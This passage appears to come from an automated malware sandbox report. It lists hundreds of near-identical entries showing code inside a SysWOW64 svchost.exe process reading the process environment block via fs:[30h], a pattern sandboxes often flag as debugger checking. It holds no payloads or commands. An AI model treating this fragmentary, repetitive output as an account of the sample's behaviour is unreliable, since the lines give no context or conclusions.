                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h]2_2_03AD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A37370 mov eax, dword ptr fs:[00000030h]2_2_03A37370
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A37370 mov eax, dword ptr fs:[00000030h]2_2_03A37370
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A37370 mov eax, dword ptr fs:[00000030h]2_2_03A37370
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D34C mov eax, dword ptr fs:[00000030h]2_2_03A2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D34C mov eax, dword ptr fs:[00000030h]2_2_03A2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05341 mov eax, dword ptr fs:[00000030h]2_2_03B05341
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29353 mov eax, dword ptr fs:[00000030h]2_2_03A29353
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29353 mov eax, dword ptr fs:[00000030h]2_2_03A29353
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h]2_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A0 mov eax, dword ptr fs:[00000030h]2_2_03A452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A0 mov eax, dword ptr fs:[00000030h]2_2_03A452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A0 mov eax, dword ptr fs:[00000030h]2_2_03A452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A0 mov eax, dword ptr fs:[00000030h]2_2_03A452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF92A6 mov eax, dword ptr fs:[00000030h]2_2_03AF92A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF92A6 mov eax, dword ptr fs:[00000030h]2_2_03AF92A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF92A6 mov eax, dword ptr fs:[00000030h]2_2_03AF92A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF92A6 mov eax, dword ptr fs:[00000030h]2_2_03AF92A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC72A0 mov eax, dword ptr fs:[00000030h]2_2_03AC72A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC72A0 mov eax, dword ptr fs:[00000030h]2_2_03AC72A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB92BC mov eax, dword ptr fs:[00000030h]2_2_03AB92BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB92BC mov eax, dword ptr fs:[00000030h]2_2_03AB92BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB92BC mov ecx, dword ptr fs:[00000030h]2_2_03AB92BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB92BC mov ecx, dword ptr fs:[00000030h]2_2_03AB92BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05283 mov eax, dword ptr fs:[00000030h]2_2_03B05283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6329E mov eax, dword ptr fs:[00000030h]2_2_03A6329E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6329E mov eax, dword ptr fs:[00000030h]2_2_03A6329E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B052E2 mov eax, dword ptr fs:[00000030h]2_2_03B052E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF2F8 mov eax, dword ptr fs:[00000030h]2_2_03AEF2F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A292FF mov eax, dword ptr fs:[00000030h]2_2_03A292FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A392C5 mov eax, dword ptr fs:[00000030h]2_2_03A392C5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A392C5 mov eax, dword ptr fs:[00000030h]2_2_03A392C5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]2_2_03A2B2D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]2_2_03A2B2D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]2_2_03A2B2D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5F2D0 mov eax, dword ptr fs:[00000030h]2_2_03A5F2D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5F2D0 mov eax, dword ptr fs:[00000030h]2_2_03A5F2D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05227 mov eax, dword ptr fs:[00000030h]2_2_03B05227
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h]2_2_03A2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A67208 mov eax, dword ptr fs:[00000030h]2_2_03A67208
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A67208 mov eax, dword ptr fs:[00000030h]2_2_03A67208
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFD26B mov eax, dword ptr fs:[00000030h]2_2_03AFD26B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFD26B mov eax, dword ptr fs:[00000030h]2_2_03AFD26B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h]2_2_03A2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A59274 mov eax, dword ptr fs:[00000030h]2_2_03A59274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A71270 mov eax, dword ptr fs:[00000030h]2_2_03A71270
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A71270 mov eax, dword ptr fs:[00000030h]2_2_03A71270
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29240 mov eax, dword ptr fs:[00000030h]2_2_03A29240
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29240 mov eax, dword ptr fs:[00000030h]2_2_03A29240
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6724D mov eax, dword ptr fs:[00000030h]2_2_03A6724D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h]2_2_03A2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEB256 mov eax, dword ptr fs:[00000030h]2_2_03AEB256
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEB256 mov eax, dword ptr fs:[00000030h]2_2_03AEB256
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h]2_2_03A36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE11A4 mov eax, dword ptr fs:[00000030h]2_2_03AE11A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE11A4 mov eax, dword ptr fs:[00000030h]2_2_03AE11A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE11A4 mov eax, dword ptr fs:[00000030h]2_2_03AE11A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE11A4 mov eax, dword ptr fs:[00000030h]2_2_03AE11A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4B1B0 mov eax, dword ptr fs:[00000030h]2_2_03A4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h]2_2_03A70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A87190 mov eax, dword ptr fs:[00000030h]2_2_03A87190
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A351ED mov eax, dword ptr fs:[00000030h]2_2_03A351ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h]2_2_03B061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h]2_2_03A601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6D1D0 mov eax, dword ptr fs:[00000030h]2_2_03A6D1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6D1D0 mov ecx, dword ptr fs:[00000030h]2_2_03A6D1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B051CB mov eax, dword ptr fs:[00000030h]2_2_03B051CB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60124 mov eax, dword ptr fs:[00000030h]2_2_03A60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A31131 mov eax, dword ptr fs:[00000030h]2_2_03A31131
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A31131 mov eax, dword ptr fs:[00000030h]2_2_03A31131
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B136 mov eax, dword ptr fs:[00000030h]2_2_03A2B136
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B136 mov eax, dword ptr fs:[00000030h]2_2_03A2B136
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B136 mov eax, dword ptr fs:[00000030h]2_2_03A2B136
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B136 mov eax, dword ptr fs:[00000030h]2_2_03A2B136
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov ecx, dword ptr fs:[00000030h]2_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF0115 mov eax, dword ptr fs:[00000030h]2_2_03AF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC9179 mov eax, dword ptr fs:[00000030h]2_2_03AC9179
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05152 mov eax, dword ptr fs:[00000030h]2_2_03B05152
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov ecx, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29148 mov eax, dword ptr fs:[00000030h]2_2_03A29148
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29148 mov eax, dword ptr fs:[00000030h]2_2_03A29148
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29148 mov eax, dword ptr fs:[00000030h]2_2_03A29148
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29148 mov eax, dword ptr fs:[00000030h]2_2_03A29148
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A37152 mov eax, dword ptr fs:[00000030h]2_2_03A37152
